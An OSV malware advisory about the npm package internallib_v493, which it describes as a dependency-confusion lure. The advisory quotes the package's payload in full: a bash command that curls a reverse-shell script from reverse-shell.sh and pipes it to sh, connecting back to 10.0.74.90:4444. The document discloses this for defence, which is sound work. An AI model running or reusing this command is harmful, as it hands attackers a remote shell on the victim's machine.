internallib_v493 @1.0.4
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID: MAL-2026-4585
Ecosystem: npm
Summary
The package's sole exported function command() in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a reverse-shell script from reverse-shell.sh and piping it directly to sh to establish a connection back to 10.0.74.90 on port 4444. The package has no other functionality; its only advertised export is the backdoor. The package name (internallib_v493) and placeholder metadata (empty author, generic description) are consistent with a dependency-confusion / internal-name-squatting lure targeting organizations with private packages of similar names. A typo in the source (reuquire instead of require) means the payload throws on load in its current form, but the malicious intent is unambiguous and a corrected republish would fire immediately on any caller invoking the export.
Source: amazon-inspector (67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7)